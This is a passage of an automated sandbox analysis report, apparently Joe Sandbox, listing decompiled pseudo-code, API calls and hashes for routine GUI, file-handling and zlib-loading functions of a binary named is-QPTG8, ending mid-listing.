Opcode Fuzzy Hash: aa7242408ec27734a04db55b95a82169450c42e8d17fcad2c02b09953d234269
Instruction Fuzzy Hash: D1213730B10215BBCB10EAE3DC51B9E77A8EF04304F90487BA500E7291E77C9A01DB1C

Uniqueness

Uniqueness Score: -1.00%

Function 00416F98 Relevance: 15.2, APIs: 10, Instructions: 167
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416F98(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t77;
				int _t130;
				void* _t131;
				void* _t152;
				void* _t153;
				void* _t154;
				struct HDC__* _t155;

				_v60.right = __ecx;
				_t155 = __edx;
				_t152 = __eax;
				_t76 =  *((intOrPtr*)(__eax + 0xb0));
				if( *((intOrPtr*)(__eax + 0xb0)) == 0) {
					L13:
					_t77 =  *(_t152 + 0xb4);
					if(_t77 == 0) {
						L23:
						return _t77;
					}
					_t77 =  *((intOrPtr*)(_t77 + 8)) - 1;
					if(_t77 < 0) {
						goto L23;
					}
					_v44.right = _t77 + 1;
					_t153 = 0;
					do {
						_t77 = E0040B654( *(_t152 + 0xb4), _t153);
						_t130 = _t77;
						if( *((char*)(_t130 + 0xc5)) != 0 && ( *(_t130 + 0x34) & 0x00000010) != 0 && ( *((char*)(_t130 + 0x37)) != 0 || ( *(_t130 + 0x1c) & 0x00000010) != 0 && ( *(_t130 + 0x35) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E0041A270(0x80000010));
							E0040AE50( *((intOrPtr*)(_t130 + 0x24)) - 1,  *((intOrPtr*)(_t130 + 0x24)) +  *((intOrPtr*)(_t130 + 0x2c)),  *((intOrPtr*)(_t130 + 0x28)) - 1,  &(_v44.right),  *((intOrPtr*)(_t130 + 0x28)) +  *((intOrPtr*)(_t130 + 0x30)));
							FrameRect(_t155,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E0041A270(0x80000014));
							E0040AE50( *((intOrPtr*)(_t130 + 0x24)),  *((intOrPtr*)(_t130 + 0x24)) +  *((intOrPtr*)(_t130 + 0x2c)) + 1,  *((intOrPtr*)(_t130 + 0x28)),  &(_v60.right),  *((intOrPtr*)(_t130 + 0x28)) +  *((intOrPtr*)(_t130 + 0x30)) + 1);
							FrameRect(_t155,  &_v60, _v60);
							_t77 = DeleteObject(_v68);
						}
						_t153 = _t153 + 1;
						_t73 =  &(_v44.right);
						 *_t73 = _v44.right - 1;
					} while ( *_t73 != 0);
					goto L23;
				}
				_t154 = 0;
				if(_v60.right != 0) {
					_t154 = E0040B69C(_t76, _v60.right);
					if(_t154 < 0) {
						_t154 = 0;
					}
				}
				_v60.bottom =  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0xb0)) + 8));
				if(_t154 >= _v60.bottom) {
					goto L13;
				} else {
					goto L5;
				}
				do {
					L5:
					_t131 = E0040B654( *((intOrPtr*)(_t152 + 0xb0)), _t154);
					if( *((char*)(_t131 + 0x37)) != 0 || ( *(_t131 + 0x1c) & 0x00000010) != 0 && ( *(_t131 + 0x35) & 0x00000004) == 0) {
						E0040AE50( *((intOrPtr*)(_t131 + 0x24)),  *((intOrPtr*)(_t131 + 0x24)) +  *(_t131 + 0x2c),  *((intOrPtr*)(_t131 + 0x28)),  &(_v44.bottom),  *((intOrPtr*)(_t131 + 0x28)) +  *(_t131 + 0x30));
						if(RectVisible(_t155,  &(_v44.top)) != 0) {
							if(( *(_t152 + 0x36) & 0x00000080) != 0) {
								 *(_t131 + 0x36) =  *(_t131 + 0x36) | 0x00000080;
							}
							_v60.top = SaveDC(_t155);
							E004143D0(_t155,  *((intOrPtr*)(_t131 + 0x28)),  *((intOrPtr*)(_t131 + 0x24)));
							IntersectClipRect(_t155, 0, 0,  *(_t131 + 0x2c),  *(_t131 + 0x30));
							E00415458(_t131, _t155, 0xf, 0);
							RestoreDC(_t155, _v80);
							 *(_t131 + 0x36) =  *(_t131 + 0x36) & 0x0000007f;
						}
					}
					_t154 = _t154 + 1;
				} while (_t154 < _v60.top);
				goto L13;
			}

0x00416f9f
0x00416fa2
0x00416fa4
0x00416fa6
0x00416fae
0x00417091
0x00417091
0x00417099
0x0041719e
0x0041719e
0x0041719e
0x004170a2
0x004170a5
0x00000000
0x00000000
0x004170ac
0x004170b0
0x004170b2
0x004170ba
0x004170bf
0x004170c8
0x00417102
0x00417125
0x00417130
0x0041713a
0x0041714f
0x00417172
0x0041717d
0x00417187
0x00417187
0x0041718c
0x0041718d
0x0041718d
0x0041718d
0x00000000
0x004170b2
0x00416fb4
0x00416fba
0x00416fc4
0x00416fc8
0x00416fca
0x00416fca
0x00416fc8
0x00416fd5
0x00416fdd
0x00000000
0x00000000
0x00000000
0x00000000
0x00416fe3
0x00416fe3
0x00416ff0
0x00416ff6
0x00417020
0x00417032
0x00417038
0x0041703a
0x0041703a
0x00417044
0x00417050
0x00417062
0x00417072
0x0041707d
0x00417082
0x00417082
0x00417032
0x00417086
0x00417087
0x00000000

APIs

RectVisible.GDI32(?,?), ref: 0041702B
SaveDC.GDI32(?), ref: 0041703F
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00417062
RestoreDC.GDI32(?,?), ref: 0041707D
CreateSolidBrush.GDI32(00000000), ref: 004170FD
FrameRect.USER32 ref: 00417130
DeleteObject.GDI32(?), ref: 0041713A
CreateSolidBrush.GDI32(00000000), ref: 0041714A
FrameRect.USER32 ref: 0041717D
DeleteObject.GDI32(?), ref: 00417187

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: d7224f7c47cc49409eb34bfd1cddc35a5edd60ae5c8e019a80344a5159ce3944
Instruction ID: c46714a1ec0c0ad87461e4327d4dd9d92905751286786d64687e42ca623993c9
Opcode Fuzzy Hash: d7224f7c47cc49409eb34bfd1cddc35a5edd60ae5c8e019a80344a5159ce3944
Instruction Fuzzy Hash: 69515D716082456FDB50EF29C8C4B9B77E8AF48314F1545AAFD488B287C738EC85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00404C0F Relevance: 15.1, APIs: 10, Instructions: 122
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00404C0F(void** __eax) {
				void* _t25;
				void* _t26;
				void* _t27;
				long _t30;
				void* _t33;
				void* _t35;
				long _t36;
				int _t39;
				void* _t41;
				void* _t47;
				void* _t48;
				long _t49;
				long _t50;
				void* _t53;
				void** _t54;
				DWORD* _t55;

				_t54 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				_t25 =  *((intOrPtr*)(__eax + 4)) - 0xd7b1;
				if(_t25 == 0) {
					_t26 = 0x80000000;
					_t50 = 2;
					_t49 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = E00404BA0;
					L8:
					_t54[9] = 0x404bf7;
					_t54[8] = E00404BC7;
					if(_t54[0x12] == 0) {
						_t54[9] = E00404BC7;
						if(_t54[1] == 0xd7b2) {
							_t27 = GetStdHandle(0xfffffff5);
						} else {
							_t27 = GetStdHandle(0xfffffff6);
						}
						if(_t27 == 0xffffffff) {
							L35:
							_t54[1] = 0xd7b0;
							return GetLastError();
						} else {
							 *_t54 = _t27;
							L28:
							if(_t54[1] == 0xd7b1) {
								L32:
								return 0;
							}
							_t30 = GetFileType( *_t54);
							if(_t30 == 0) {
								CloseHandle( *_t54);
								_t54[1] = 0xd7b0;
								return 0x69;
							}
							if(_t30 == 2) {
								_t54[8] = E00404BCA;
							}
							goto L32;
						}
					}
					_push(0);
					_push(0x80);
					_push(_t49);
					_push(0);
					_push(_t50);
					_push(_t26);
					_t33 =  &(_t54[0x12]);
					_push(_t33);
					L00401228();
					if(_t33 == 0xffffffff) {
						goto L35;
					}
					 *_t54 = _t33;
					if(_t54[1] != 0xd7b3) {
						goto L28;
					}
					_t54[1] = _t54[1] - 1;
					_t35 = GetFileSize( *_t54, 0) + 1;
					if(_t35 == 0) {
						goto L35;
					}
					_t36 = _t35 - 0x81;
					if(_t36 < 0) {
						_t36 = 0;
					}
					if(SetFilePointer( *_t54, _t36, 0, 0) + 1 == 0) {
						goto L35;
					} else {
						_t39 = ReadFile( *_t54,  &(_t54[0x53]), 0x80, _t55, 0);
						_t53 = 0;
						if(_t39 != 1) {
							goto L35;
						}
						_t41 = 0;
						while(_t41 < _t53) {
							if( *((char*)(_t54 + _t41 + 0x14c)) == 0x1a) {
								if(SetFilePointer( *_t54, _t41 - _t53, 0, 2) + 1 == 0 || SetEndOfFile( *_t54) != 1) {
									goto L35;
								} else {
									goto L28;
								}
							}
							_t41 = _t41 + 1;
						}
						goto L28;
					}
				}
				_t47 = _t25 - 1;
				if(_t47 == 0) {
					_t26 = 0x40000000;
					_t50 = 1;
					_t49 = 2;
					L7:
					_t54[7] = E00404BCA;
					goto L8;
				}
				_t48 = _t47 - 1;
				if(_t48 == 0) {
					_t26 = 0xc0000000;
					_t50 = 1;
					_t49 = 3;
					goto L7;
				}
				return _t48;
			}

0x00404c10
0x00404c14
0x00404c17
0x00404c1d
0x00404c22
0x00404c2f
0x00404c34
0x00404c39
0x00404c3e
0x00404c6e
0x00404c6e
0x00404c75
0x00404c80
0x00404d34
0x00404d42
0x00404d4a
0x00404d44
0x00404d4a
0x00404d4a
0x00404d52
0x00404d8f
0x00404d8f
0x00000000
0x00404d54
0x00404d54
0x00404d56
0x00404d5d
0x00404d76
0x00000000
0x00404d76
0x00404d61
0x00404d68
0x00404d7c
0x00404d81
0x00000000
0x00404d88
0x00404d6d
0x00404d6f
0x00404d6f
0x00000000
0x00404d6d
0x00404d52
0x00404c86
0x00404c88
0x00404c8d
0x00404c8e
0x00404c90
0x00404c91
0x00404c92
0x00404c95
0x00404c96
0x00404c9e
0x00000000
0x00000000
0x00404ca4
0x00404cad
0x00000000
0x00000000
0x00404cb3
0x00404cbf
0x00404cc0
0x00000000
0x00000000
0x00404cc6
0x00404ccb
0x00404ccd
0x00404ccd
0x00404cdc
0x00000000
0x00404ce2
0x00404cf7
0x00404cfc
0x00404cfe
0x00000000
0x00000000
0x00404d04
0x00404d06
0x00404d12
0x00404d26
0x00000000
0x00404d32
0x00000000
0x00404d32
0x00404d26
0x00404d14
0x00404d14
0x00000000
0x00404d06
0x00404cdc
0x00404c24
0x00404c25
0x00404c47
0x00404c4c
0x00404c51
0x00404c67
0x00404c67
0x00000000
0x00404c67
0x00404c27
0x00404c28
0x00404c58
0x00404c5d
0x00404c62
0x00000000
0x00404c62
0x00000000

APIs

6D2B5CA0.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404C96
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404CBA
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404CD6
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404CF7
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404D20
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404D2A
GetStdHandle.KERNEL32(000000F5), ref: 00404D4A
GetFileType.KERNEL32(?,000000F5), ref: 00404D61
CloseHandle.KERNEL32(?,?,000000F5), ref: 00404D7C
GetLastError.KERNEL32(000000F5), ref: 00404D96

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: File$HandlePointer$CloseErrorLastReadSizeType
String ID:
API String ID: 2587015848-0
Opcode ID: 32fbc3d591d887db1daa96df7588f8d0b8ed6a028886d61b7680b13e569ddf3c
Instruction ID: 206bcdb747724065788a6a6a215919135cebaaf405beceec5406885cc449240e
Opcode Fuzzy Hash: 32fbc3d591d887db1daa96df7588f8d0b8ed6a028886d61b7680b13e569ddf3c
Instruction Fuzzy Hash: 814180B01057009AE7306F248809B3775E5AFC1764F248A3FE2A6BA6E0E77DE845875D

Uniqueness

Uniqueness Score: -1.00%

Function 00422400 Relevance: 15.1, APIs: 10, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00422400(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x111)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x110) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x116)) != 1) {
							_t48 = GetSystemMenu(E004183F8( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x111)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x110) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x110) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}

0x00422407
0x00422411
0x0042241a
0x00422424
0x0042242d
0x00422437
0x00422450
0x0042245f
0x00422469
0x00422476
0x00422483
0x00422490
0x0042249d
0x004224aa
0x00000000
0x004224b7
0x004224cb
0x004224d5
0x004224d5
0x004224dd
0x004224e7
0x00000000
0x004224f1
0x004224e7
0x00422437
0x00422424
0x004224f8

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 0042244B
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422469
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422476
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422483
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422490
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0042249D
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004224AA
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004224B7
EnableMenuItem.USER32 ref: 004224D5
EnableMenuItem.USER32 ref: 004224F1

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: 3989febc2265f450d094ef528963c25562e4eb2e8bf0b05666faad11cc839985
Instruction ID: ccbfe1b94657816dcf372c0fd86d317857036ad24732e56999036d3a366f9e19
Opcode Fuzzy Hash: 3989febc2265f450d094ef528963c25562e4eb2e8bf0b05666faad11cc839985
Instruction Fuzzy Hash: 572121707857457AE724EA25CD8BF9B7AD8AB04708F0450A5BA447F2D3C7FCA9808A58

Uniqueness

Uniqueness Score: -1.00%

Function 0045BA7C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0045BA7C(void* __eax, void* __ebx, struct _browseinfo __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags, char _a4) {
				intOrPtr* _v8;
				char _v9;
				char _v16;
				char _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				struct _ITEMIDLIST* _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v52;
				char* _v56;
				struct _browseinfo _v64;
				char _v324;
				intOrPtr _t49;
				void* _t59;
				intOrPtr _t67;
				struct _browseinfo _t70;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t68 = __edi;
				_t72 = _t73;
				_t74 = _t73 + 0xfffffdbc;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_t70 = __ecx;
				_v8 = __edx;
				_t59 = __eax;
				_push(_t72);
				_push(0x45bc0b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v9 = 0;
				E0042CC98( *_v8, __ecx,  &_v16, __eflags);
				_push( &_v20);
				L0042CD9C();
				if(E0042CD74( &_v20) != 0) {
					_v20 = 0;
				}
				E00402A64( &_v64, 0x20);
				_v64 = _t70;
				_v56 =  &_v324;
				_v52 = E00403880(_t59);
				_v48 = 0x41;
				if(_a4 == 0) {
					_v48 = _v48 | 0x00000200;
				}
				_v44 = E0045BA18;
				if(_v16 != 0) {
					_v40 = E00403880(_v16);
				}
				_v24 = GetActiveWindow();
				_v28 = E0041F0BC(0, _t59, _t68, _t70);
				_push(0);
				L0042CD04();
				_push(_t72);
				_push(0x45bb80);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v32 = SHBrowseForFolder( &_v64);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x45bb87);
				L0042CD0C();
				E0041F170(_v28);
				_t49 =  *0x48d628; // 0x21d2410
				SetActiveWindow( *(_t49 + 0x20));
				return SetActiveWindow(_v24);
			}

0x0045ba7c
0x0045ba7d
0x0045ba7f
0x0045ba85
0x0045ba86
0x0045ba87
0x0045ba8a
0x0045ba8d
0x0045ba8f
0x0045ba92
0x0045ba96
0x0045ba97
0x0045ba9c
0x0045ba9f
0x0045baa2
0x0045baae
0x0045bab6
0x0045bab7
0x0045bac3
0x0045bac7
0x0045bac7
0x0045bad4
0x0045bad9
0x0045bae2
0x0045baec
0x0045baef
0x0045bafa
0x0045bafc
0x0045bafc
0x0045bb03
0x0045bb0e
0x0045bb18
0x0045bb18
0x0045bb20
0x0045bb2a
0x0045bb2d
0x0045bb2f
0x0045bb36
0x0045bb37
0x0045bb3c
0x0045bb3f
0x0045bb4b
0x0045bb50
0x0045bb53
0x0045bb56
0x0045bb5b
0x0045bb63
0x0045bb68
0x0045bb71
0x0045bb7f

APIs

Part of subcall function 0042CC98: CharPrevA.USER32(00000000,00000000,?,?,?,00000000,0042CDDE,00000000,0042CE04,?,?,?,00000000,00000000,?,0042CE19), ref: 0042CCC0

SHGetMalloc.SHELL32(?), ref: 0045BAB7
GetActiveWindow.USER32 ref: 0045BB1B
CoInitialize.OLE32(00000000), ref: 0045BB2F
SHBrowseForFolder.SHELL32(?), ref: 0045BB46
7677F460.OLE32(0045BB87,00000000,?,?,?,?,?,00000000,0045BC0B), ref: 0045BB5B
SetActiveWindow.USER32(?,0045BB87,00000000,?,?,?,?,?,00000000,0045BC0B), ref: 0045BB71
SetActiveWindow.USER32(?,?,0045BB87,00000000,?,?,?,?,?,00000000,0045BC0B), ref: 0045BB7A

Strings

A, xrefs: 0045BAEF

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ActiveWindow$7677BrowseCharF460FolderInitializeMallocPrev
String ID: A
API String ID: 201045231-3554254475
Opcode ID: 5baf2667879cceed4b1d1887611e3af5972f39edb87cd5624835f7ea0dce8631
Instruction ID: f22e79129fdc4d9f1744fb1c4deeed74ab824a2047b8e059aaba7f2031e49bd9
Opcode Fuzzy Hash: 5baf2667879cceed4b1d1887611e3af5972f39edb87cd5624835f7ea0dce8631
Instruction Fuzzy Hash: D6312171E107089FCB11EFA6D885A9EBBF8EB48304F41847AF804E7252D7785A048B99

Uniqueness

Uniqueness Score: -1.00%

Function 00459A74 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00459A74(intOrPtr __eax) {
				intOrPtr _t2;

				_push("inflateInit_");
				_push(__eax);
				L00405AA4();
				 *0x4adf48 = __eax;
				_push("inflate");
				_push(__eax);
				L00405AA4();
				 *0x4adf4c = __eax;
				_push("inflateEnd");
				_push(__eax);
				L00405AA4();
				 *0x4adf50 = __eax;
				_push("inflateReset");
				_push(__eax);
				L00405AA4();
				 *0x4adf54 = __eax;
				if( *0x4adf48 == 0 ||  *0x4adf4c == 0 ||  *0x4adf50 == 0 ||  *0x4adf54 == 0) {
					_t2 = 0;
				} else {
					_t2 = 1;
				}
				if(_t2 == 0) {
					 *0x4adf48 = 0;
					 *0x4adf4c = 0;
					 *0x4adf50 = 0;
					 *0x4adf54 = 0;
					return _t2;
				}
				return _t2;
			}

0x00459a77
0x00459a7c
0x00459a7d
0x00459a82
0x00459a87
0x00459a8c
0x00459a8d
0x00459a92
0x00459a97
0x00459a9c
0x00459a9d
0x00459aa2
0x00459aa7
0x00459aac
0x00459aad
0x00459ab2
0x00459abe
0x00459adb
0x00459adf
0x00459adf
0x00459adf
0x00459ae3
0x00459ae7
0x00459aef
0x00459af7
0x00459aff
0x00000000
0x00459aff
0x00459b06

APIs

6D2B5550.KERNEL32(00000000,inflateInit_,?,00474228,00000000,0047426B), ref: 00459A7D
6D2B5550.KERNEL32(00000000,inflate,00000000,inflateInit_,?,00474228,00000000,0047426B), ref: 00459A8D
6D2B5550.KERNEL32(00000000,inflateEnd,00000000,inflate,00000000,inflateInit_,?,00474228,00000000,0047426B), ref: 00459A9D
6D2B5550.KERNEL32(00000000,inflateReset,00000000,inflateEnd,00000000,inflate,00000000,inflateInit_,?,00474228,00000000,0047426B), ref: 00459AAD

Strings

inflateInit_, xrefs: 00459A77
inflateReset, xrefs: 00459AA7
inflateEnd, xrefs: 00459A97
inflate, xrefs: 00459A87

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550
String ID: inflate$inflateEnd$inflateInit_$inflateReset
API String ID: 2242650566-3516654456
Opcode ID: 10def7b3286c3cebfd6e17169adf8aee31dba8c75d6b2cd586d6a52f40372db7
Instruction ID: 860f5f0ddfdcfd816d1b219f1080b024ad1093819357f9d665938aa2be996169
Opcode Fuzzy Hash: 10def7b3286c3cebfd6e17169adf8aee31dba8c75d6b2cd586d6a52f40372db7
Instruction Fuzzy Hash: 0C01DEB0E40780DEEB14DF26AD457573B95E789306F14907BB80795AA6D7BC0C48CE1D

Uniqueness

Uniqueness Score: -1.00%

Function 0041AAF0 Relevance: 13.7, APIs: 9, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041AAF0(void* __eax, intOrPtr __ecx, int* __edx, intOrPtr _a4, int* _a8) {
				intOrPtr _v8;
				long _v12;
				int _v16;
				int _v20;
				void* __edi;
				void* __ebp;
				intOrPtr* _t58;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr _t71;
				void* _t72;
				void* _t75;
				long _t78;
				intOrPtr _t90;
				long _t116;
				intOrPtr _t121;
				intOrPtr* _t138;
				intOrPtr* _t140;
				intOrPtr _t144;
				int* _t147;
				intOrPtr _t152;
				intOrPtr _t155;
				intOrPtr _t156;
				intOrPtr _t157;
				int* _t163;
				intOrPtr* _t167;

				_t149 = __ecx;
				_t58 = __eax + 0x55000000;
				_v8 = __ecx;
				_t147 = __edx;
				_t167 = _t58;
				_t163 = _a8;
				if(_v8 != 0) {
					 *((intOrPtr*)( *_t167 + 0x10))();
					_v16 = _t163[2] -  *_t163;
					_v20 = _t163[3] - _t163[1];
					_t152 =  *0x41acf0; // 0x1
					E0041B380(_t167, __ecx, _t152, _t163);
					if( *0x48c540 == 0) {
						 *0x48c540 = E0041CF3C(1);
						_t144 =  *0x48c540; // 0x0
						E0041DA7C(_t144, 1);
					}
					_t67 =  *0x48c540; // 0x0
					if( *((intOrPtr*)( *_t67 + 0x20))() < _v16) {
						_t140 =  *0x48c540; // 0x0
						_t149 =  *_t140;
						 *((intOrPtr*)( *_t140 + 0x2c))();
					}
					_t69 =  *0x48c540; // 0x0
					_t154 =  *_t69;
					if( *((intOrPtr*)( *_t69 + 0x1c))() < _v20) {
						_t154 = _v20;
						_t138 =  *0x48c540; // 0x0
						_t149 =  *_t138;
						 *((intOrPtr*)( *_t138 + 0x28))();
					}
					_t71 =  *0x48c540; // 0x0
					_t72 = E0041D2E8(_t71, _t149, _t154);
					_t155 =  *0x41acf0; // 0x1
					E0041B380(_t72, _t149, _t155, _t163);
					_t75 = E0041D2E8(_v8, _t149, _t155);
					_t156 =  *0x41acf0; // 0x1
					E0041B380(_t75, _t149, _t156, _t163);
					_t78 = E0041A270(_a4);
					_v12 = SetBkColor( *(E0041D2E8(_v8, _t149, _t156) + 4), _t78);
					_t90 =  *0x48c540; // 0x0
					L00405CB4();
					SetBkColor( *(E0041D2E8(_v8, _t149, _t156) + 4), _v12);
					_t157 =  *0x41acf4; // 0x9
					E0041B380(_t167, _t149, _t157, _t163);
					StretchBlt( *(_t167 + 4),  *_t147, _t147[1], _t147[2] -  *_t147, _t147[3] - _t147[1],  *(E0041D2E8(_v8, _t149, _t157) + 4),  *_t163, _t163[1], _v16, _v20, 0xcc0020);
					_t116 = SetTextColor( *(_t167 + 4), 0);
					_v12 = SetBkColor( *(_t167 + 4), 0xffffff);
					_t121 =  *0x48c540; // 0x0
					StretchBlt( *(_t167 + 4),  *_t147, _t147[1], _t147[2] -  *_t147, _t147[3] - _t147[1],  *(E0041D2E8(_t121, _t149, _t157) + 4), 0, 0, _v16, _v20, 0xe20746);
					SetTextColor( *(_t167 + 4), _t116);
					SetBkColor( *(_t167 + 4), _v12);
					_t58 =  *((intOrPtr*)( *_t167 + 0xc))( *((intOrPtr*)(E0041D2E8(_t90, _t149, _t156) + 4)), 0, 0, _v16, _v20,  *(E0041D2E8(_v8, _t149, _t156) + 4),  *_t163, _t163[1], 0xcc0020);
				}
				return _t58;
			}

0x0041aaf0
0x0041aaf0
0x0041aafd
0x0041ab00
0x0041ab02
0x0041ab04
0x0041ab0b
0x0041ab15
0x0041ab1d
0x0041ab26
0x0041ab29
0x0041ab31
0x0041ab3d
0x0041ab4b
0x0041ab52
0x0041ab57
0x0041ab57
0x0041ab5c
0x0041ab69
0x0041ab6e
0x0041ab73
0x0041ab75
0x0041ab75
0x0041ab78
0x0041ab7d
0x0041ab85
0x0041ab87
0x0041ab8a
0x0041ab8f
0x0041ab91
0x0041ab91
0x0041ab94
0x0041ab99
0x0041ab9e
0x0041aba4
0x0041abac
0x0041abb1
0x0041abb7
0x0041abbf
0x0041abd6
0x0041abfd
0x0041ac0b
0x0041ac20
0x0041ac25
0x0041ac2d
0x0041ac6a
